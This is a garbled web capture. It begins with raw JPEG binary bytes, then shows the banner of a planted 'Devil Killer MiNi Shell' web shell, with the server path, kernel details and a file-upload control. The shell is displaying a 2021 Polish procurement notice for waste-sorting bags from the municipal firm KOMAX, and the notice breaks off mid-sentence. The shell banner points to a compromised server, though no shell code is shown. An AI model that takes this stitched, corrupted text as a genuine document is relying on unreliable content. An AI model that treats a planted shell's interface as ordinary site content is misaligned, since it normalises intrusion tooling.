JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210624/0009317101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00093171 z dnia 2021-06-24</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa fabrycznie nowych worków foliowych oraz worków do selektywnej zbiórki odpadów” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PRZEDSIĘBIORSTWO KOMUNALNE &quot;KOMAX&quot; SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">KOMAX</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 071007834</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Adama Mickiewicza 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kęty</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-650</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">komax@komax.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.komax.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa fabrycznie nowych worków foliowych oraz worków do selektywnej zbiórki odpadów” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d9457573-d295-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00093171</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w<br/>formie elektronicznej za pośrednictwem miniPortalu, adres strony<br/>internetowej:https://www.miniportal.uzp.pl/. W postępowaniu o udzielenie zamówienia<br/>komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który<br/>dostępny jest pod adresem:https://www.miniportal.uzp.gov.pl/, poczty elektronicznej komax@komax.pl,<br/>oraz ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>Wymaganiatechniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformyusług administracji publicznej (ePUAP).Wykonawca przystępując do<br/>niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu<br/>przestrzegać postanowieńtego regulaminu. Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi<br/>150 MB. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji,<br/>przekazywanych wpostępowaniu, przyjmuje się datę ich przekazania na ePUAP. Zamawiający podał w<br/>informacjach ogólnych niniejszej SWZ ID postępowania. Dane postępowanie można wyszukać również<br/>na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze<br/>strony głównej z zakładki Postępowania na miniPortalu.Sposób sporządzenia dokumentów<br/>elektronicznychmusi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobusporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452)<br/>orazrozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).Sposób komunikowania się Zamawiającego z<br/>Wykonawcami (z wyłączeniem oferty i załączników do oferty): za pomocą poczty<br/>elektronicznejZamawiającego wskazany powyżej w informacjach ogólnych oraz poczty elektronicznej<br/>Wykonawcy wskazanej w formularzu oferty. Sposób sporządzania i przekazywania informacji określają<br/>rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. (Dz.U. z 2020 r., poz. 2452) w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dladokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz rozporządzenie Ministra Rozwoju, pracy i technologii z<br/>dnia 23 grudnia 2020 r. (Dz.U. z 2020 r., poz. 2415) w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający odwykonawcy. Jeżeli<br/>Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje za<br/>pośrednictwem środków komunikacji elektronicznej, każda ze stron na żądanie drugiej strony<br/>niezwłocznie potwierdza fakt ich otrzymania. Zamawiający sugeruje, aby korespondencja dotycząca<br/>niniejszego postępowania o udzielenie zamówienia publicznego oznaczonebyły nazwą oraz znakiem<br/>postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RozporządzeniaParlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27.04.2016 w sprawie ochrony<br/>osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu<br/>takich danych oraz uchylenia dyrektywy 95/46/WE, Dziennik Urzędowy UE, L 119/1 z 4.05.2016,<br/>informuje,że: Administratorem Państwa danych osobowych (dalej: „Administrator") jest PK KOMAX Sp.<br/>z o.o., ul. Mickiewicza 8, 32-650 Kęty,e-mail: rodo@komax.pl tel.:+48 33 8452770;Administrator<br/>wyznaczył Inspektora Ochrony Danych nadzorującego prawidłowość przetwarzania danych<br/>osobowych, z którym można skontaktować się za pośrednictwem adresu e-mail:<br/>rodo@komax.pl.Państwa dane osobowe będą przetwarzane w celu związanym z postępowaniem o<br/>udzielenie zam. publ. prowadzonego w trybie przetargu nieograniczonego oraz w przypadku wyboru<br/>Pana oferty w celu realizacji warunków zawieranych umów; wykonania ciążących na Administratorze<br/>danych obowiązków prawnych; dochodzenia ewentualnych roszczeń z tytułu niewykonania lub<br/>nienależytego wykonania zawartej umowy. Podstawą prawną ich przetwarzania są: art. 6 ust.1 lit.b<br/>ogólnego rozp o ochronie danych osobowych (przetwarzanie jest niezbędne do wykonania umowy,<br/>której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane<br/>dotyczą, przed zawarciem umowy), art. 6 ust. 1 lit. c (przetwarzanie jest niezbędne do<br/>wypełnieniaobowiązku prawnego ciążącego na administratorze) oraz ustawy z dnia 11 września 2019<br/>r. Prawo zamówień publicznych, dalej „ustawa Pzp”. Dane osobowe pozyskane w związku z<br/>postępowaniem o udzielenie zamówienia i będą przetwarzane przez Zamawiającego wyłącznie w celu<br/>złożenia w/w oferty cenowej, w tym ewentualnego wykonania umowy, realizacji obowiązków i praw (w<br/>tym roszczeń) wiążących się z zawartą umową oraz w celu realizacji obowiązków wynikających z<br/>przepisów prawa. Obowiązek podania osobowych jest wymogiem ustawowym określonym w<br/>przepisach uPZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencjeniepodania określonych danych mogą uniemożliwić wzięcie udziału w postępowaniu.<br/>Posiadacie Państwo: prawo dostępu do swoich danych oraz otrzymania ich kopii; prawo do<br/>sprostowania (poprawiania) swoich danych; prawo do usunięcia danych osobowych, w sytuacji, gdy<br/>przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu<br/>prawa lub w ramach sprawowania władzy publicznej; prawo do ograniczenia przetwarzania danych,<br/>przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego praw; prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy. Dane nie<br/>będąprzetwarzane w sposób zautomatyzowany w tym również profilowane. Zamawiający przypomina o<br/>ciążącym na Wykonawcy dopełnieniu obowiązków informacyjnych wynikających z art.13 i art.14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku<br/>zprowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego<br/>udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w<br/>art. 14 ust. 5 RODO. Pozostałe kwestie wskazane są w rozdziale 1.4 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PK/02/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa (w rozumieniu art.2 pkt 2 uPzp) fabrycznie nowych worków foliowych oraz worków do selektywnej zbiórki odpadów.<br/>2.	Nazwa zadania: Dostawa fabrycznie nowych worków foliowych oraz worków do selektywnej zbiórki odpadów.<br/>3.	Opis worków łącznie z ich parametrami:<br/>Przedmiotem zamówienia jest dostawa do Przedsiębiorstwa Komunalnego „KOMAX” Spółka z o.o. w Kętach ul. Mickiewicza 8, worków foliowych do selektywnej zbiórki odpadów i worków innych, przeznaczonych do bieżącej działalności Spółki, o parametrach:<br/>1.1.	Worki do selektywnej zbiórki odpadów:<br/>1.	Worki foliowe LDPE o wymiarach szer. 550 mm x wys. 1000 mm z folii o grubości min. 0,070 mm w kolorze zielonym z nadrukiem SZKŁO w ilości 240 000 sztuk.<br/>2.	Worki foliowe LDPE o wymiarach szer. 650 mm x wys. 1000 mm z folii o grubości min. 0,050 mm w kolorze żółtym z nadrukiem METALE i TWORZYWA SZTUCZ-NE w ilości 850 000 sztuk.<br/>3.	Worki foliowe LDPE o wymiarach szer. 650 mm x wys. 1000 mm z folii o grubości min. 0,050 mm w kolorze niebieskim z nadrukiem PAPIER w ilości 240 000 sztuk.<br/>4.	Worki foliowe LDPE o wymiarach szer. 600 mm x wys. 700 mm z folii o grubości min. 0,050 mm w kolorze brązowym z nadrukiem ODPADY ZIELONE w ilości 1 400 000 sztuk.<br/>Wszystkie powyższe worki powinny być ze ściągaczem, separowane (każdy worek w rolce osobno), na rolce:<br/>a)	po 10 sztuk – worki w kolorze zielonym, żółtym i niebieskim,<br/>b)	po 20 sztuk – worki w kolorze brązowym.<br/>5.	Wskazana w ofercie ceny worków powinny zawierać przekazanie Zamawiającemu 10 sztuk kompletów (po minimum 4 różnego koloru worki do segregacji odpadów/1 komplet) z przeznaczeniem do wykorzystania demonstracyjnego u innych Zamawiających (Gminy ogłaszające postępowania przetargowe na odbiór odpadów) oraz w PSZOK-ach i w placówkach oświatowych. Przekazanie ww. kompletów nastąpi w dniu podpisania umowy. Worki w kompletach winny posiadać parametry nie gorsze niż ujęte w swz. Komplety powinny zostać spakowane w opakowanie (np. tuba, pudełko, koszyk itp.) umożliwiające prowadzącym zajęcia edukacyjne ich wielokrotne wykorzystanie oraz uniemożlwiające zdekompletowanie zawartości. Zestawy demonstracyjne lub/i ich opakowanie może zawierać treści zachęcające do prowadzenia segregacji odpadów.<br/>6.	Zamawiający zastrzega sobie prawo do zmniejszenia ilości dostarczonych worków, a tym samym do proporcjonalnego obniżenia wynagrodzenia. Z tego tytułu Wykonawcy nie przysługują jakiekolwiek roszczenia względem Zamawiającego, a przede wszystkim roszczenie o zapłatę za ilość niedostarczonych worków.<br/>7.	Zamawiający zamierza wykorzystać minimum 80% dostawy worków wskazanych w opisie przedmiotu zamówienia.<br/>8.	Zamawiający może, w razie wątpliwości w zakresie jakości i parametrów technicznych dostarczanych worków, także bez obecności przedstawiciela Wykonawcy badać w zewnętrznym laboratorium jakość worków.<br/>9.	Kontroli parametrów technicznych z każdej dostawy zgodnie z pkt. powyżej podlegać będzie minimum 5 worków danego rodzaju.<br/>10.	Analizę jakości, grubości oraz pozostałych parametrów worków Zamawiający wyko-na w wyspecjalizowanym laboratorium. W przypadku stwierdzenia wad, całkowity koszt badania oraz koszt pracy pracowników zamawiającego w tym zakresie poniesie Wykonawca.<br/>11.	Wykonawca na przedmiot umowy udziela Zamawiającemu 6-miesięcznej gwarancji. Bieg okresu gwarancji rozpoczyna się z dniem odbioru przedmiotu umowy.<br/><br/>1.2.	Worki do bieżącej działalności Spółki – worki pozostałe:<br/>1.	Worki na kompost przeźroczyste szer. 700mm x wys. 1200mm, z folii o grubości min. 0,120 mm z nadrukiem (nadruk podany na etapie wykonawstwa przez Zamawiającego) – 2000 sztuk<br/>2.	Worki czarne bez nadruku szer. 700mm x wys. 800mm, z folii o grubości min. 0,040 mm – 20 000 sztuk<br/>Worki na kompost przeźroczyste luzem, dostarczone partiami w paczkach według zapotrzebowania Zamawiającego, minimalna ilość sztuk w paczce to 100 sztuk.<br/>2.	Dodatkowe wymagania które muszą spełniać wszystkie oferowane worki do selektywnej zbiórki odpadów:<br/>1.	Worki muszą być wykonane z półprzeźroczystej folii LDPE umożliwiającej szybką ocenę jego zawartości.<br/>2.	Tolerancja wymiarów: +/- 5(mm).<br/>3.	Grubość worka winna być niezmienna na całej powierzchni<br/>4.	Worki powinny posiadać jednolitą strukturę tworzywa na całej powierzchni, a grubość worka musi być niezmienna na całej jego powierzchni.<br/>5.	Worki muszą posiadać ściągacz umieszczony w tunelu w górnej części worka bez zgrzewu dennego.<br/>6.	Nadruk fleksograficzny z jonizacją jednostronną, wykonany systemem potokowym 2 - 3 krotny na długości worka w kolorze czarnym zawierał będzie: <br/>a)	Logo zamawiającego z danym teleadresowymi (wzór dostarczy Zamawiający);<br/>b)	Nazwę Gminy (wysokość czcionki 45 mm);<br/>c)	Nazwę zawartości, tj. SZKŁO, METALE I TWORZYWA SZTUCZNE, PAPIER, ODPADY ZIELONE (wysokość czcionki 35 mm – 45 mm).<br/>d)	Ewentualnie – według wyboru Zamawiającego: informacja o sposobie korzystania z worka, zasady segregacji itp.<br/>7.	Zamawiający zastrzega sobie możliwość zmiany opisu worków w trakcie trwania umowy.<br/>8.	Worki przeznaczone do selektywnej zbiórki tworzyw sztucznych. Wytrzymałość worka na rozerwanie min. 25 kg sprawdzona poprzez wypełnienie worka ciężarem 25 kg.<br/>9.	Kolory jednolite na całej powierzchni worka.<br/>10.	Tolerancja wielkości nadruków : +/- 5(mm).<br/>11.	Nadruk czytelny i wyraźny, bez zniekształceń.<br/>12.	Wyklucza się możliwość użycia do produkcji worków materiałów obniżających wytrzymałość folii.<br/>13.	Worki winny być wytrzymałe na działanie promieni UV – minimum 1 rok.<br/>14.	Worki winny być odporne na niskie temperatury.<br/>15.	W zakresie oddziaływania na środowisko: tworzywa sztuczne i barwniki nie powinny zawierać kadmu, ołowiu i innych pierwiastków szkodliwych dla środowiska; worki winny być obojętne dla wód gruntowych.<br/>16.	Parametry worków powinny spełniać wymagania określone w normie PN-EN 13592 dotyczącej worków używanych do selektywnej zbiórki odpadów w gospodarstwach domowych.<br/>17.	Worki powinny spełniać wymagania dyrektywy 94/64/EC potwierdzone w polskim systemie prawnym wymagań określonym w artykule 11 ustawy z dnia 13 czerwca 2013r. o gospodarce opakowaniami i odpadami opakowaniowymi (t.j.: Dz.U.z 2020r., nr 63, poz. 1114 ze zm.) w zakresie dotyczącym recyklingu materiałowego ( PN-EN 13430) i odzysku energii (PN-EN 13431) oraz zawartości metali ciężkich (PKN-CEN/CE 13695-1), a także substancji niebezpiecznych dla środowiska (PN-EN 13428, PN-CR 13695-2).<br/>18.	Worki w kolorze zielonym, żółtym i niebieskim winny być konfekcjonowane w opisanych paczkach 200 sztuk w formie rolek po 20 sztuk worków w każdej (czyli 20 rolek po 10 szt. w paczce). Worki w kolorze brązowym winny być konfekcjonowane w opisanych paczkach 200 sztuk w formie rolek po 10 sztuk worków w każdej (czy-li 10 rolek po 20 szt. w paczce). <br/>3.	Dodatkowe wymagania które muszą spełniać wszystkie oferowane worki do bieżącej działalności Spółki – worki pozostałe:<br/>1.	Worki muszą być wykonane z półprzeźroczystej folii LDPE umożliwiającej szybką ocenę jego zawartości (nie dotyczy worków na kompost przeźroczystych).<br/>2.	Tolerancja wymiarów: +/- 5(mm).<br/>3.	Grubość worka winna być niezmienna na całej powierzchni.<br/>4.	Worki powinny posiadać jednolitą strukturę tworzywa na całej powierzchni, a grubość worka musi być niezmienna na całej jego powierzchni.<br/>5.	Nadruk na worku na kompost fleksograficzny z jonizacją jednostronną, wykonany systemem potokowym 2 - 3 krotny na długości worka w kolorze czarnym zawierał będzie: <br/>a)	Logo zamawiającego z danym teleadresowymi (wzór dostarczy Zamawiający);<br/>b)	Dane dotyczące produktu – nawozu + uwagi, środki ostrożności itp. (wzór dostarczy Zamawiający);<br/>c)	Nazwę zawartości, skład tj. np. (wysokość czcionki 5 mm – 45 mm lub wg wskazań zamawiającego).<br/>d)	Ewentualnie – według wyboru Zamawiającego: informacja o sposobie korzystania z worka, itp.<br/>6.	Zamawiający zastrzega sobie możliwość zmiany opisu worków w trakcie trwania umowy.<br/>7.	Wytrzymałość worka na rozerwanie:<br/>a)	Worki przeźroczyste - min. 50 kg sprawdzona poprzez wypełnienie worka ciężarem 50 kg.<br/>b)	Worki czarne - min. 25 kg sprawdzona poprzez wypełnienie worka ciężarem 25 kg.<br/>8.	Kolory jednolite na całej powierzchni worka.<br/>9.	Tolerancja wielkości nadruków : +/- 5(mm).<br/>10.	Nadruk czytelny i wyraźny, bez zniekształceń.<br/>11.	Wyklucza się możliwość użycia do produkcji worków materiałów obniżających wytrzymałość folii.<br/>12.	Worki winny być wytrzymałe na działanie promieni UV – minimum 1 rok.<br/>13.	Worki winny być odporne na niskie temperatury.<br/>14.	W zakresie oddziaływania na środowisko: tworzywa sztuczne i barwniki nie powinny zawierać kadmu, ołowiu i innych pierwiastków szkodliwych dla środowiska; worki winny być obojętne dla wód gruntowych.<br/>15.	Parametry worków powinny spełniać wymagania określone w normie PN-EN 13592 dotyczącej worków używanych do selektywnej zbiórki odpadów.<br/>16.	Worki powinny spełniać wymagania dyrektywy 94/64/EC potwierdzone w polskim systemie prawnym wymagań określonym w artykule 11 ustawy z dnia 13 czerwca 2013r. o gospodarce opakowaniami i odpadami opakowaniowymi (t.j.: Dz.U.z 2020r., nr 63, poz. 1114 ze zm.) w zakresie dotyczącym recyklingu materiałowego ( PN-EN 13430) i odzysku energii (PN-EN 13431) oraz zawartości metali ciężkich (PKN-CEN/CE 13695-1), a także substancji niebezpiecznych dla środowiska (PN-EN 13428, PN-CR 13695-2).<br/>17.	Worki czarne rolkowane, separowane (każdy worek w rolce osobno), winny być konfekcjonowane w opisanych paczkach 200 sztuk w formie rolek po 20 sztuk worków w każdej (czyli 10 rolek po 20 szt. w paczce). <br/>18.	Worki na kompost przeźroczyste luzem, dostarczone partiami w paczkach według zapotrzebowania Zamawiającego, minimalna ilość sztuk w paczce to 100 sztuk.<br/>Wykonawca obowiązany 